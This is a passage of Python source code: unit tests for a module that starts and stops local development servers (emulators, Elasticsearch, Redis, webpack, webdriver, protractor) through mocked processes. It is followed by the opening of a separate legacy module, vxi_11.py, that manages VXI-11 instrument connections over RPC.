lambda p, **kw: None if is_data_dir(p) else old_makedirs(p, **kw))
with python_utils.ExitStack() as exit_stack:
exit_stack.enter_context(self.swap(os.path, 'exists', new_exists))
exit_stack.enter_context(self.swap(shutil, 'rmtree', new_rmtree))
exit_stack.enter_context(self.swap(os, 'makedirs', new_makedirs))
yield new_rmtree, new_makedirs
def assert_proc_was_managed_as_expected(
self, logs, pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=False):
"""Asserts that the process ended as expected.
Args:
logs: list(str). The logs emitted during the process's lifetime.
pid: int. The process ID to inspect.
manager_should_have_sent_terminate_signal: bool. Whether the manager
should have sent a terminate signal to the process.
manager_should_have_sent_kill_signal: bool. Whether the manager
should have sent a kill signal to the process.
"""
proc_pattern = r'[A-Za-z ]+\((name="[A-Za-z]+", )?pid=%d\)' % (pid,)
expected_patterns = []
if manager_should_have_sent_terminate_signal:
expected_patterns.append(r'Terminating %s\.\.\.' % proc_pattern)
if manager_should_have_sent_kill_signal:
expected_patterns.append(r'Forced to kill %s!' % proc_pattern)
else:
expected_patterns.append(r'%s has already ended\.' % proc_pattern)
logs_with_pid = [msg for msg in logs if re.search(proc_pattern, msg)]
if expected_patterns and not logs_with_pid:
self.fail(msg='%r has no match in logs=%r' % (proc_pattern, logs))
self.assert_matches_regexps(logs_with_pid, expected_patterns)
def test_does_not_raise_when_psutil_not_in_path(self):
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(sys, 'path', []))
# Entering the context should not raise.
self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
def test_concats_command_args_when_shell_is_true(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a', 1], timeout_secs=10, shell=True))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(popen_calls, [self.POPEN_CALL('a 1', {'shell': True})])
def test_passes_command_args_as_list_of_strings_when_shell_is_false(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a', 1], shell=False, timeout_secs=10))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(
popen_calls, [self.POPEN_CALL(['a', '1'], {'shell': False})])
def test_filters_empty_strings_from_command_args_when_shell_is_true(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['', 'a', '', 1], timeout_secs=10, shell=True))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(popen_calls, [self.POPEN_CALL('a 1', {'shell': True})])
def test_filters_empty_strings_from_command_args_when_shell_is_false(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['', 'a', '', 1], shell=False, timeout_secs=10))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(
popen_calls, [self.POPEN_CALL(['a', '1'], {'shell': False})])
def test_reports_killed_processes_as_warnings(self):
self.exit_stack.enter_context(self.swap_popen(
unresponsive=True))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(
logs, proc.pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=True)
def test_terminates_child_processes(self):
self.exit_stack.enter_context(self.swap_popen(num_children=3))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
pids = [c.pid for c in proc.children()] + [proc.pid]
self.exit_stack.close()
self.assertEqual(len(set(pids)), 4)
for pid in pids:
self.assert_proc_was_managed_as_expected(logs, pid)
def test_kills_child_processes(self):
self.exit_stack.enter_context(self.swap_popen(
num_children=3, unresponsive=True))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
pids = [c.pid for c in proc.children()] + [proc.pid]
self.exit_stack.close()
self.assertEqual(len(set(pids)), 4)
for pid in pids:
self.assert_proc_was_managed_as_expected(
logs, pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=True)
def test_respects_processes_that_are_killed_early(self):
self.exit_stack.enter_context(self.swap_popen())
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
time.sleep(1)
proc.kill()
proc.wait()
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(
logs, proc.pid,
manager_should_have_sent_terminate_signal=False)
def test_respects_processes_that_are_killed_after_delay(self):
self.exit_stack.enter_context(self.swap_popen(
unresponsive=True))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
def _kill_after_delay():
"""Kills the targeted process after a short delay."""
time.sleep(5)
proc.kill()
assassin_thread = threading.Thread(target=_kill_after_delay)
assassin_thread.start()
self.exit_stack.close()
assassin_thread.join()
self.assert_proc_was_managed_as_expected(
logs, proc.pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=False)
def test_does_not_raise_when_exit_fails(self):
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_raise(
psutil, 'wait_procs', error=Exception('uh-oh')))
logs = self.exit_stack.enter_context(self.capture_logging(
min_level=logging.ERROR))
self.exit_stack.enter_context(servers.managed_process(['a', 'bc']))
# Should not raise.
self.exit_stack.close()
self.assert_matches_regexps(logs, [
r'Failed to stop Process\(pid=1\) gracefully!\n'
r'Traceback \(most recent call last\):\n'
r'.*'
r'Exception: uh-oh',
])
def test_managed_firebase_emulator(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(servers.managed_firebase_auth_emulator())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertIn('firebase', popen_calls[0].program_args)
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
def test_managed_cloud_datastore_emulator(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(
self.swap_managed_cloud_datastore_emulator_io_operations(True))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(
servers.managed_cloud_datastore_emulator())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertIn(
'beta emulators datastore start', popen_calls[0].program_args)
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
def test_managed_cloud_datastore_emulator_creates_missing_data_dir(self):
self.exit_stack.enter_context(self.swap_popen())
rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
self.swap_managed_cloud_datastore_emulator_io_operations(False))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(
servers.managed_cloud_datastore_emulator())
self.exit_stack.close()
self.assertEqual(rmtree_counter.times_called, 0)
self.assertEqual(makedirs_counter.times_called, 1)
def test_managed_cloud_datastore_emulator_clears_data_dir(self):
self.exit_stack.enter_context(self.swap_popen())
rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
self.swap_managed_cloud_datastore_emulator_io_operations(True))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(servers.managed_cloud_datastore_emulator(
clear_datastore=True))
self.exit_stack.close()
self.assertEqual(rmtree_counter.times_called, 1)
self.assertEqual(makedirs_counter.times_called, 1)
def test_managed_cloud_datastore_emulator_acknowledges_data_dir(self):
self.exit_stack.enter_context(self.swap_popen())
rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
self.swap_managed_cloud_datastore_emulator_io_operations(True))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(servers.managed_cloud_datastore_emulator(
clear_datastore=False))
self.exit_stack.close()
self.assertEqual(rmtree_counter.times_called, 0)
self.assertEqual(makedirs_counter.times_called, 0)
def test_managed_dev_appserver(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(servers.managed_dev_appserver(
'app.yaml', env=None))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertIn('dev_appserver.py', popen_calls[0].program_args)
self.assertEqual(popen_calls[0].kwargs, {'shell': True, 'env': None})
def test_managed_elasticsearch_dev_server(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(
servers.managed_elasticsearch_dev_server())
self.exit_stack.close()
self.assertEqual(
popen_calls[0].program_args,
'%s/bin/elasticsearch -q' % common.ES_PATH)
self.assertEqual(popen_calls[0].kwargs, {
'shell': True,
'env': {'ES_PATH_CONF': common.ES_PATH_CONFIG_DIR},
})
def test_start_server_removes_elasticsearch_data(self):
check_function_calls = {
'shutil_rmtree_is_called': False
}
old_os_path_exists = os.path.exists
def mock_os_remove_files(file_path): # pylint: disable=unused-argument
check_function_calls['shutil_rmtree_is_called'] = True
def mock_os_path_exists(file_path): # pylint: disable=unused-argument
if file_path == common.ES_PATH_DATA_DIR:
return True
return old_os_path_exists(file_path)
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'call', value=scripts_test_utils.PopenStub()))
self.exit_stack.enter_context(self.swap(
shutil, 'rmtree', mock_os_remove_files))
self.exit_stack.enter_context(self.swap(
os.path, 'exists', mock_os_path_exists))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(
servers.managed_elasticsearch_dev_server())
self.exit_stack.close()
self.assertTrue(check_function_calls['shutil_rmtree_is_called'])
def test_managed_redis_server_throws_exception_when_on_windows_os(self):
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'is_windows_os', value=True))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.assertRaisesRegexp(
Exception,
'The redis command line interface is not installed because '
'your machine is on the Windows operating system. The redis '
'server cannot start.',
lambda: self.exit_stack.enter_context(
servers.managed_redis_server()))
def test_managed_redis_server(self):
original_os_remove = os.remove
original_os_path_exists = os.path.exists
@test_utils.CallCounter
def mock_os_remove(path):
if path == common.REDIS_DUMP_PATH:
return
original_os_remove(path)
def mock_os_path_exists(path):
if path == common.REDIS_DUMP_PATH:
return
original_os_path_exists(path)
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(self.swap_with_checks(
os.path, 'exists', mock_os_path_exists))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess,
'check_call',
lambda _: 0,
expected_args=[([common.REDIS_CLI_PATH, 'shutdown', 'nosave'],)]
))
self.exit_stack.enter_context(self.swap_with_checks(
os, 'remove', mock_os_remove, called=False))
self.exit_stack.enter_context(servers.managed_redis_server())
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s' % (common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH))
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
self.exit_stack.close()
def test_managed_redis_server_deletes_redis_dump_when_it_exists(self):
original_os_remove = os.remove
original_os_path_exists = os.path.exists
@test_utils.CallCounter
def mock_os_remove(path):
if path == common.REDIS_DUMP_PATH:
return
original_os_remove(path)
def mock_os_path_exists(path):
if path == common.REDIS_DUMP_PATH:
return True
original_os_path_exists(path)
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(self.swap_with_checks(
os.path, 'exists', mock_os_path_exists))
self.exit_stack.enter_context(self.swap_with_checks(
os, 'remove', mock_os_remove))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess,
'check_call',
lambda _: 0,
expected_args=[([common.REDIS_CLI_PATH, 'shutdown', 'nosave'],)]
))
self.exit_stack.enter_context(servers.managed_redis_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s' % (common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH))
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
self.assertEqual(mock_os_remove.times_called, 1)
def test_managed_web_browser_on_linux_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_return(
os, 'listdir', value=[]))
managed_web_browser = servers.create_managed_web_browser(123)
self.assertIsNotNone(managed_web_browser)
self.exit_stack.enter_context(managed_web_browser)
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args, ['xdg-open', 'http://localhost:123/'])
def test_managed_web_browser_on_virtualbox_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_return(
os, 'listdir', value=['VBOX-123']))
managed_web_browser = servers.create_managed_web_browser(123)
self.assertIsNone(managed_web_browser)
self.assertEqual(len(popen_calls), 0)
def test_managed_web_browser_on_mac_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Darwin'))
self.exit_stack.enter_context(self.swap_to_always_return(
os, 'listdir', value=[]))
managed_web_browser = servers.create_managed_web_browser(123)
self.assertIsNotNone(managed_web_browser)
self.exit_stack.enter_context(managed_web_browser)
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args, ['open', 'http://localhost:123/'])
def test_managed_web_browser_on_windows_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Windows'))
self.exit_stack.enter_context(self.swap_to_always_return(
os, 'listdir', value=[]))
managed_web_browser = servers.create_managed_web_browser(123)
self.assertIsNone(managed_web_browser)
self.assertEqual(len(popen_calls), 0)
def test_managed_portserver(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
proc = self.exit_stack.enter_context(servers.managed_portserver())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'python -m scripts.run_portserver '
'--portserver_unix_socket_address %s' % (
common.PORTSERVER_SOCKET_FILEPATH),
)
self.assertEqual(proc.signals_received, [signal.SIGINT])
self.assertEqual(proc.terminate_count, 0)
self.assertEqual(proc.kill_count, 0)
def test_managed_portserver_removes_existing_socket(self):
original_os_remove = os.remove
original_os_path_exists = os.path.exists
@test_utils.CallCounter
def mock_os_remove(path):
if path == common.PORTSERVER_SOCKET_FILEPATH:
return
original_os_remove(path)
def mock_os_path_exists(path):
if path == common.PORTSERVER_SOCKET_FILEPATH:
return True
original_os_path_exists(path)
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_with_checks(
os.path, 'exists', mock_os_path_exists))
self.exit_stack.enter_context(self.swap_with_checks(
os, 'remove', mock_os_remove))
proc = self.exit_stack.enter_context(servers.managed_portserver())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'python -m scripts.run_portserver '
'--portserver_unix_socket_address %s' % (
common.PORTSERVER_SOCKET_FILEPATH),
)
self.assertEqual(proc.signals_received, [signal.SIGINT])
self.assertEqual(mock_os_remove.times_called, 1)
def test_managed_portserver_when_signals_are_rejected(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
proc = self.exit_stack.enter_context(servers.managed_portserver())
proc.reject_signal = True
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'python -m scripts.run_portserver '
'--portserver_unix_socket_address %s' % (
common.PORTSERVER_SOCKET_FILEPATH),
)
self.assertEqual(proc.signals_received, [signal.SIGINT])
self.assertEqual(proc.terminate_count, 1)
self.assertEqual(proc.kill_count, 0)
def test_managed_portserver_when_unresponsive(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
proc = self.exit_stack.enter_context(servers.managed_portserver())
proc.unresponsive = True
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'python -m scripts.run_portserver '
'--portserver_unix_socket_address %s' % (
common.PORTSERVER_SOCKET_FILEPATH),
)
self.assertEqual(proc.signals_received, [signal.SIGINT])
self.assertEqual(proc.terminate_count, 1)
self.assertEqual(proc.kill_count, 1)
def test_managed_webpack_compiler_in_watch_mode_when_build_succeeds(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'abc', b'Built at: 123', b'def']))
str_io = python_utils.string_io()
self.exit_stack.enter_context(contextlib.redirect_stdout(str_io))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_webpack_compiler(
watch_mode=True))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(len(popen_calls), 1)
self.assertIn('--color', popen_calls[0].program_args)
self.assertIn('--watch', popen_calls[0].program_args)
self.assertIn('--progress', popen_calls[0].program_args)
self.assert_matches_regexps(str_io.getvalue().strip().split('\n'), [
'Starting new Webpack Compiler',
'abc',
'Built at: 123',
'def',
'Stopping Webpack Compiler',
])
def test_managed_webpack_compiler_in_watch_mode_raises_when_not_built(self):
# NOTE: The 'Built at: ' message is never printed.
self.exit_stack.enter_context(self.swap_popen(outputs=[b'abc', b'def']))
str_io = python_utils.string_io()
self.exit_stack.enter_context(contextlib.redirect_stdout(str_io))
self.assertRaisesRegexp(
IOError, 'First build never completed',
lambda: self.exit_stack.enter_context(
servers.managed_webpack_compiler(watch_mode=True)))
self.assert_matches_regexps(str_io.getvalue().strip().split('\n'), [
'Starting new Webpack Compiler',
'abc',
'def',
'Stopping Webpack Compiler',
])
def test_managed_webpack_compiler_uses_explicit_config_path(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
config_path='config.json'))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config config.json' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH))
def test_managed_webpack_compiler_uses_prod_source_maps_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=True, use_source_maps=True))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_PROD_SOURCE_MAPS_CONFIG))
def test_managed_webpack_compiler_uses_prod_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=True, use_source_maps=False))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_PROD_CONFIG))
def test_managed_webpack_compiler_uses_dev_source_maps_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=False, use_source_maps=True))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_DEV_SOURCE_MAPS_CONFIG))
def test_managed_webpack_compiler_uses_dev_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=False, use_source_maps=False))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_DEV_CONFIG))
def test_managed_webpack_compiler_with_max_old_space_size(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
max_old_space_size=2056))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertIn('--max-old-space-size=2056', popen_calls[0].program_args)
def test_managed_webdriver_with_explicit_chrome_version(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_call', lambda _: None, expected_args=[
(
[common.NODE_BIN_PATH,
common.WEBDRIVER_MANAGER_BIN_PATH, 'update',
'--versions.chrome', '123'],
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(
servers.managed_webdriver_server(chrome_version='123'))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 123 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_on_mac_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Darwin'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_output', lambda _: b'4.5.6.78', expected_args=[
(
['/Applications/Google Chrome.app/Contents/MacOS'
'/Google Chrome',
'--version'],
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
python_utils,
'url_open',
lambda _: mock.Mock(read=lambda: b'4.5.6'),
expected_args=[
(
'https://chromedriver.storage.googleapis.com'
'/LATEST_RELEASE_4.5.6',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 4.5.6 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_on_non_mac_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_output', lambda _: b'1.2.3.45', expected_args=[
(['google-chrome', '--version'],),
]))
self.exit_stack.enter_context(self.swap_with_checks(
python_utils, 'url_open',
lambda _: mock.Mock(read=lambda: b'1.2.3'),
expected_args=[
(
'https://chromedriver.storage.googleapis.com'
'/LATEST_RELEASE_1.2.3',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 1.2.3 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_fails_to_get_chrome_version(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_raise(
subprocess, 'check_output', error=OSError))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None, called=False))
expected_regexp = 'Failed to execute "google-chrome --version" command'
with self.assertRaisesRegexp(Exception, expected_regexp):
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.assertEqual(len(popen_calls), 0)
def test_managed_webdriver_on_window_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Windows'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_output', value=b'1.2.3.45'))
self.exit_stack.enter_context(self.swap_to_always_return(
python_utils, 'url_open', value=mock.Mock(read=lambda: b'1.2.3')))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'is_x64_architecture', value=True))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'inplace_replace_file_context',
lambda *_: contextlib.nullcontext(), expected_args=[
(
common.CHROME_PROVIDER_FILE_PATH,
re.escape('this.osArch = os.arch();'),
'this.osArch = "x64";',
),
(
common.GECKO_PROVIDER_FILE_PATH,
re.escape('this.osArch = os.arch();'),
'this.osArch = "x64";',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 1.2.3 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_protractor_with_invalid_sharding_instances(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
with self.assertRaisesRegexp(ValueError, 'should be larger than 0'):
self.exit_stack.enter_context(
servers.managed_protractor_server(sharding_instances=0))
with self.assertRaisesRegexp(ValueError, 'should be larger than 0'):
self.exit_stack.enter_context(
servers.managed_protractor_server(sharding_instances=-1))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 0)
def test_managed_protractor(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(servers.managed_protractor_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
program_args = popen_calls[0].program_args
self.assertIn(
'%s --unhandled-rejections=strict %s %s' % (
common.NODE_BIN_PATH, common.PROTRACTOR_BIN_PATH,
common.PROTRACTOR_CONFIG_FILE_PATH),
program_args)
self.assertNotIn('--inspect-brk', program_args)
self.assertIn('--params.devMode=True', program_args)
self.assertIn('--suite full', program_args)
def test_managed_protractor_with_explicit_args(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(servers.managed_protractor_server(
suite_name='abc', sharding_instances=3, debug_mode=True,
dev_mode=False, stdout=subprocess.PIPE))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].kwargs, {'shell': True, 'stdout': subprocess.PIPE})
program_args = popen_calls[0].program_args
# From debug_mode=True.
self.assertIn('--inspect-brk', program_args)
# From sharding_instances=3.
self.assertIn('--capabilities.shardTestFiles=True', program_args)
self.assertIn('--capabilities.maxInstances=3', program_args)
# From dev_mode=True.
self.assertIn('--params.devMode=False', program_args)
# From suite='full'.
self.assertIn('--suite abc', program_args)
|
vxi_11.py | "The basic infrastructure for maintaining a vxi-11 protocol connection to a remote device"
_rcsid="vxi_11.py,v 1.6 2003/05/30 13:29:23 mendenhall Release-20050805"
import rpc
from rpc import TCPClient, RawTCPClient
import exceptions
import struct
import traceback
import time
import weakref
import sys
import select
try:
import threading
threads=1
except:
threads=0
connection_dict={}
def close_all_connections():
"disconnect and close out all vxi_11 connections created here, even if their object references have been lost"
for wobj in connection_dict.keys():
name, wconn=connection_dict[wobj]
conn=wconn() #dereference weak ref
if conn is not None:
try:
conn.disconnect()
except:
conn.log_exception("***vxi_11.close_all_connections exception: ")
else:
del connection_dict[wobj] #how did this happen?
class Junk_OneWayAbortClient(RawTCPClient):
"""OneWayAbortClient allows one to handle the strange, one-way abort rpc from an Agilent E5810.
Really, it doesn't even do a one-way transmission... it loses aborts, so this is history """
def do_call(self):
call = self.packer.get_buf()
rpc.sendrecord(self.sock, call)
self.unpacker.reset('\0\0\0\0') #put a valid return value into the unpacker
class VXI_11_Error(IOError):
vxi_11_errors={
0:"No error", 1:"Syntax error", 3:"Device not accessible",
4:"Invalid link identifier", 5:"Parameter error", 6:"Channel not established",
8:"Operation not supported", 9:"Out of resources", 11:"Device locked by another link",
12:"No lock held by this link", 15:"IO Timeout", 17:"IO Error", 21:"Invalid Address",
23:"Abort", 29:"Channel already established" ,
"eof": "Cut off packet received in rpc.recvfrag()",
"sync":"stream sync lost",
"notconnected": "Device not connected"}
def identify_vxi_11_error(self, error):
if self.vxi_11_errors.has_key(error):
return `error`+": "+self.vxi_11_errors[error]
else:
return `error`+": Unknown error code"
def __init__(self, code, **other_info):
self.code=code
self.message=self.identify_vxi_11_error(code)
self.other_info=other_info
